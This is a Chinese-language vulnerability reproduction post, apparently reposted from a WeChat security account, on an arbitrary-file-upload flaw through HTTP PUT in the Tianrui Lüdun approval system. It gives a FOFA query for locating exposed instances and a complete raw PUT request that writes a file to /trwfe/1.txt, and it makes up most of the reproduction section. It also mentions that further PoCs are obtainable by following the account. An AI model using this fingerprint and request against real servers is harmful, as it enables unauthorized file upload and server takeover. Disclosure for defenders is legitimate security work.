漏洞简介
天锐绿盾审批系统的支持PUT请求方式,导致攻击者可上传任意恶意文件,获取服务器权限。
fofa:body="location.href=location.href+"trwfe";"
漏洞复现
由于不可言说的原因,可以发现本公众号的文章被删了一大半。后续POC都通过关注回复获取,之前的内容不敢补档了,想要了解的可以加入星球查看。
PUT /trwfe/1.txt HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 3 111 上传路径:/trwfe/1.txt
原文始发于微信公众号(良月安全):[漏洞复现]天锐绿盾审批系统存在PUT文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论